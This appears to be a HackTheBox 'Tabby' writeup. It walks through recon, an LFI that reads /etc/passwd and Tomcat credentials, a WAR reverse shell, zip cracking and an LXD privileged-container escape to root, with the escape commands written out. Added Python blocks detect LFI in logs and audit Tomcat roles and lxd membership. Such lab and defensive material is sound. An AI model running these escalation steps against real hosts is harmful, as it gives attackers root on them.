title: "HTB - TABBY"
author: mayomacam
date: "2020-07-03"
subject: "CTF Writeup"
keywords: HACKTHEBOX, tabby, CTF, Security

box

Tabby is a simple, old-style box. It's all about curl and Tomcat 9; just understand how Tomcat 9 works.

Information Gathering

Nmap

We begin our reconnaissance by running an Nmap scan checking default scripts and testing for vulnerabilities.
sudo update-alternatives --config java
┌─[[email protected]]─[~]
└──╼ $sudo nmap -p- --min-rate 10000 -Pn 10.10.10.194
[sudo] password for mayomacam: 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-25 16:35 IST
Nmap scan report for 10.10.10.194
Host is up (0.20s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 11.99 seconds
┌─[[email protected]]─[~]
└──╼ $sudo nmap -sC -sV -sT -p22,80,8080 -Pn 10.10.10.194
[sudo] password for mayomacam: 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-25 16:55 IST
Nmap scan report for 10.10.10.194
Host is up (0.21s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Mega Hosting
8080/tcp open  http    Apache Tomcat
|_http-title: Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.55 seconds
┌─[[email protected]]─[~]
└──╼ $
From the above output we can see that ports 22, 80, and 8080 are open.
Run wfuzz against the website to find files and directories.
┌─[[email protected]]─[~]
└──╼ $wfuzz -c -w /usr/share/wordlists/dirb/big.txt -z list,txt-php-html -u http://10.10.10.194/FUZZ.FUZ2Z --hc 404,403 -t 100

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.194/FUZZ.FUZ2Z
Total requests: 61407

===================================================================
ID           Response   Lines    Word     Chars       Payload        
===================================================================

000003043:   200        35 L     237 W    1574 Ch     "Readme - txt" 
000028688:   200        373 L    938 W    14175 Ch    "index - php"  
000037628:   200        0 L      0 W      0 Ch        "news - php"   

Total time: 199.8666
Processed Requests: 61407
Filtered Requests: 61404
Requests/sec.: 307.2398
┌─[[email protected]]─[~]
└──╼ $wfuzz -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404,403 -u "http://10.10.10.194/files/FUZZ" -t 100

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.194/files/FUZZ
Total requests: 220560

===================================================================
ID           Response   Lines    Word     Chars       Payload        
===================================================================

000000063:   301        9 L      28 W     320 Ch      "archive"      
000003473:   200        150 L    375 W    6507 Ch     "statement"    

Total time: 616.8924
Processed Requests: 220560
Filtered Requests: 220558
Requests/sec.: 357.5339
Run gobuster against port 8080 with the Apache Tomcat wordlist.
┌─[[email protected]]─[~/hackthebox/tobby]
└──╼ $gobuster dir -u http://10.10.10.194:8080/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/ApacheTomcat.fuzz.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.194:8080/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/SecLists/Discovery/Web-Content/ApacheTomcat.fuzz.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/06/26 08:12:42 Starting gobuster
===============================================================
//examples/jsp/index.html (Status: 200)
//examples (Status: 302)
//examples/jsp/snp/snoop.jsp (Status: 200)
//examples/servlets/index.html (Status: 200)
//manager (Status: 302)
//manager/html/ (Status: 401)
//manager/jmxproxy (Status: 401)
//manager/html (Status: 401)
//manager/status (Status: 401)
//manager/text (Status: 401)
===============================================================
2020/06/26 08:12:43 Finished
===============================================================

FOOTHOLD

First let’s check the website.

website

There is one more webpage: news.php.

website

Inspecting the element gives us nothing. The file parameter in the link looks usable for LFI, so we try it to see if we can get some info, and on our first try we can read /etc/passwd.

lfi
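
The traversal above leaves a clear trace in the web server's access log. The following is an added example, not part of the original writeup: a small Python detector that runs over constructed Apache combined-format log lines (the sample lines and IPs are made up for the example) and flags requests whose query parameters contain traversal sequences or sensitive file names, after URL-decoding twice so single- and double-encoded forms are caught.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample log lines (Apache combined format); not taken from the box.
SAMPLE_LOG = """\
10.10.14.2 - - [25/Jun/2020:16:40:01 +0000] "GET /news.php?file=statement HTTP/1.1" 200 6507 "-" "Mozilla/5.0"
10.10.14.2 - - [25/Jun/2020:16:40:05 +0000] "GET /news.php?file=../../../../etc/passwd HTTP/1.1" 200 1821 "-" "curl/7.68.0"
10.10.14.2 - - [25/Jun/2020:16:40:09 +0000] "GET /news.php?file=..%2F..%2F..%2Fvar%2Flib%2Ftomcat9%2Fconf%2Ftomcat-users.xml HTTP/1.1" 200 2231 "-" "curl/7.68.0"
10.10.14.3 - - [25/Jun/2020:16:41:00 +0000] "GET /index.php HTTP/1.1" 200 14175 "-" "Mozilla/5.0"
"""

# Minimal parser for the fields we need: client IP, timestamp, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# File names that have no business appearing inside an application's query string.
SENSITIVE_PATHS = ("/etc/passwd", "/etc/shadow", "tomcat-users.xml", "/proc/self")


def classify_request(target):
    """Return the reasons (possibly none) a request target looks like file inclusion."""
    reasons = []
    # Decode twice: attackers commonly double-encode "../" to slip past naive filters.
    decoded = unquote(unquote(target))
    query = parse_qs(urlsplit(decoded).query, keep_blank_values=True)
    for name, values in query.items():
        for value in values:
            if "../" in value or "..\\" in value:
                reasons.append(f"traversal in parameter '{name}'")
            if any(p in value for p in SENSITIVE_PATHS):
                reasons.append(f"sensitive path in parameter '{name}'")
    return reasons


def find_lfi_attempts(log_text):
    """Scan access-log text and return one record per suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a real pipeline would count these
        reasons = classify_request(m.group("target"))
        if reasons:
            hits.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "target": m.group("target"),
                "status": int(m.group("status")),
                "reasons": reasons,
            })
    return hits


if __name__ == "__main__":
    for hit in find_lfi_attempts(SAMPLE_LOG):
        # A 200 on a traversal request means the file was very likely served.
        print(hit["ip"], hit["status"], hit["target"], "|", "; ".join(hit["reasons"]))
```

The status code matters for triage: a traversal request answered with 200 (as in the sample) indicates the inclusion worked, whereas 404/403 responses point to blocked probing. The real fix for the page's news.php is to map the `file` parameter onto an allow-list of known page names rather than concatenating it into a path.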

Let's leave it here and check our other ports to see what else we have.

8080

It's Apache Tomcat 9. I can't seem to find, through the LFI, the files that are present on the website, so I install Apache Tomcat 9 on my own system to check which files can be accessed by anyone on the system.

tomcat9

While searching for creds I found some interesting files.

logrotate

The /var/lib/tomcat9/conf/ folder works, and we get our first creds.

tomcat9

Exploitation

Using the creds, log in to host-manager.

tomcat9

As we can see, we don't have the admin-script permission, so all that's left is the manager-script role's permissions. So on Google I find this.

github
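
The roles granted in tomcat-users.xml decide what an account can do once its password leaks: manager-gui, manager-script and manager-jmx all allow deploying applications (that is, running code as the Tomcat service user), while manager-status only reads server status. The following is an added example, not from the writeup or the Tomcat project: a Python audit that parses a constructed tomcat-users.xml fragment (the usernames, roles and passwords in it are made up), reports which accounts hold deployment or host-admin rights or a weak password, and a helper that checks whether a config file's mode lets other users read it, since a world-readable credentials file is exactly what an LFI on a neighbouring web application turns into a foothold.

```python
import stat
import xml.etree.ElementTree as ET

# Tomcat role names (these are the real role names from the Tomcat manager docs).
DEPLOY_ROLES = {"manager-gui", "manager-script", "manager-jmx"}  # can deploy WARs
ADMIN_ROLES = {"admin-gui", "admin-script"}                       # host-manager access
MIN_PASSWORD_LEN = 12                                            # assumed local policy

# Constructed tomcat-users.xml fragment for the example; not the box's file.
WEAK_CONFIG = """\
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="admin-gui"/>
  <role rolename="manager-script"/>
  <role rolename="manager-status"/>
  <user username="tomcat" password="tomcat" roles="admin-gui,manager-script"/>
  <user username="status" password="EXAMPLE-STRONG-PASSPHRASE" roles="manager-status"/>
</tomcat-users>
"""


def _local(tag):
    """Strip the XML namespace so files with and without xmlns are handled alike."""
    return tag.rsplit("}", 1)[-1]


def audit_users(xml_text):
    """Return (username, finding) pairs for every risky account in tomcat-users.xml."""
    root = ET.fromstring(xml_text)
    findings = []
    for el in root.iter():
        if _local(el.tag) != "user":
            continue
        name = el.get("username", "")
        password = el.get("password", "")
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        deploy = sorted(roles & DEPLOY_ROLES)
        if deploy:
            findings.append((name, "can deploy applications via " + ", ".join(deploy)))
        admin = sorted(roles & ADMIN_ROLES)
        if admin:
            findings.append((name, "can manage virtual hosts via " + ", ".join(admin)))
        # Password equal to the username, or shorter than policy, is a guessable credential.
        if password and (password == name or len(password) < MIN_PASSWORD_LEN):
            findings.append((name, "weak or default password"))
    return findings


def conf_file_world_readable(mode):
    """True when the 'other' read bit is set, e.g. 0o644; a credentials file should be 0o640 or tighter."""
    return bool(mode & stat.S_IROTH)


if __name__ == "__main__":
    for user, finding in audit_users(WEAK_CONFIG):
        print(f"[!] {user}: {finding}")
    print("0o644 world readable:", conf_file_world_readable(0o644))
    print("0o640 world readable:", conf_file_world_readable(0o640))
```

To run it against a live file, read the XML with `open(path).read()` and pass `os.stat(path).st_mode` to `conf_file_world_readable`. The defensive takeaway from the box is the combination: a single account holding both manager and admin roles, a trivial password, and a config file readable by the web server's user.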

So I create a WAR file using msfvenom.

msfvenom

and upload it to the server. The upload command from the GitHub link doesn't work for me, because we are not admin-script. So I use what is given there for Tomcat 7 instead.

upload

Now I have to open nc on my computer and browse to the uploaded WAR file.

http://10.10.10.194:8080/shell.war

We get our shell as tomcat.

tomcat

User Flag

First I have to upgrade to a proper working shell. The usual Python interactive shell doesn't work; then I remember we don't have python2 as the primary python anymore, so I update the command and it works: we have a shell.

python-shell

python3-shell

We can't use nano and clear because the TERM environment variable is not set, so I have to set it:
export TERM=ansi
We get a proper working shell.
Now on to user. First I run linpeas on the machine. Some data from linpeas:

linpeas

system details

linpeas

users

linpeas

user-with permissions

linpeas

All shells we can use or spawn.

linpeas

Now let's go to the home directory, /opt/tomcat9, and check the files.

tomcat

Nothing found. Then I remember that many web servers keep backups of their files, which can only be done by admins. As we saw in the user permissions, ash has adm permissions. So I check the /var/www/html/ folder, where I find a password-protected backup.

backup

So I download the files from the box into a files folder. When I open the backup file it requires a password. This can be quite useful on boxes, so I ran fcrackzip on the backup file.

zip

Found the password for the backup file. The file belongs to user ash, and on boxes a password may belong to someone, so I su ash and now I am ash, and read ash's user.txt.

ash

Root Flag

I ran linpeas again as user ash but didn't get anything. So while fcrackzip was cracking the password I searched the whole filesystem and found cloud.cfg. Searching online, I learned we can run applications in containers; it's more like Docker but for applications.

https://www.hackingarticles.in/lxd-privilege-escalation/

Here I got the whole root-related idea. So I try the exploit.
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
It takes some time but gives an alpine-v3.12-x86_64-20200703_0717.tar.gz file. Then I upload it to the box.

alpine

Now I run:
lxc image import ./apline-v3.10-x86_64-20200703_0717.tar.gz --alias hell
lxc image list
I see some other people's applications are running too, and some commands give errors because the others are already running. Otherwise the commands work perfectly.
lxc init hell ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh

alpine

Run id and we are root in the container, and we don't need a password for root access. All that's left is to go to /mnt/root/root/ (because /mnt/root is where the host's root filesystem is mounted inside the container, so we have to go to its root folder for root.txt) and read root.txt.

root
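
The root step works because membership in the lxd group lets a user create a privileged container and mount the host's / into it, which is root-equivalent; the docker group has the same property. The following is an added example, not part of the writeup: a Python audit that lists members of root-equivalent groups from a constructed /etc/group excerpt (the usernames and GIDs are made up) and flags container configurations that combine security.privileged with a host-root disk device, taking the structure of `lxc config show` output as an already-parsed dict (also constructed for the example). Both checks cover the passages above on the lxd group membership found with linpeas and on the container created at the end.

```python
# Constructed /etc/group excerpt for the example; not the box's file.
GROUP_FILE = """\
root:x:0:
adm:x:4:syslog,ash
sudo:x:27:
lxd:x:116:ash
tomcat:x:998:
"""

# Groups whose members can obtain root on the host without sudo.
ROOT_EQUIVALENT = {"lxd", "docker"}

# Constructed dict mirroring the YAML printed by `lxc config show <name>` after parsing.
SAMPLE_CONTAINER = {
    "config": {"security.privileged": "true"},
    "devices": {
        "mydevice": {"type": "disk", "source": "/", "path": "/mnt/root"},
        "root": {"type": "disk", "path": "/", "pool": "default"},
    },
}


def parse_groups(text):
    """Parse /etc/group text into {group_name: [members]}."""
    groups = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        name, _password, _gid, members = line.split(":", 3)
        groups[name] = [m for m in members.split(",") if m]
    return groups


def root_equivalent_members(text):
    """Return only the root-equivalent groups that actually have members."""
    groups = parse_groups(text)
    return {g: groups[g] for g in sorted(ROOT_EQUIVALENT) if groups.get(g)}


def privileged_host_mounts(container_name, config):
    """Flag a privileged container and any disk device that exposes the host's /."""
    issues = []
    privileged = str(config.get("config", {}).get("security.privileged", "false")).lower()
    if privileged == "true":
        issues.append(f"{container_name}: security.privileged=true")
    for dev, spec in config.get("devices", {}).items():
        # The container's own rootfs device has no "source"; a host-root mount has source "/".
        if spec.get("type") == "disk" and spec.get("source") == "/":
            issues.append(f"{container_name}: device {dev} mounts host / at {spec.get('path')}")
    return issues


if __name__ == "__main__":
    for group, members in root_equivalent_members(GROUP_FILE).items():
        print(f"[!] group {group} is root-equivalent; members: {', '.join(members)}")
    for issue in privileged_host_mounts("ignite", SAMPLE_CONTAINER):
        print("[!]", issue)
```

On a real host, feed `open("/etc/group").read()` to `root_equivalent_members` and parse `lxc config show <name>` with a YAML library before calling `privileged_host_mounts`. The mitigation is the same in both cases: treat lxd group membership as equivalent to sudo and grant it only to administrators.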

Conclusion

It's beginner friendly, so it's simple; understanding how Tomcat 9 works is the main thing here. I enjoyed this box a lot.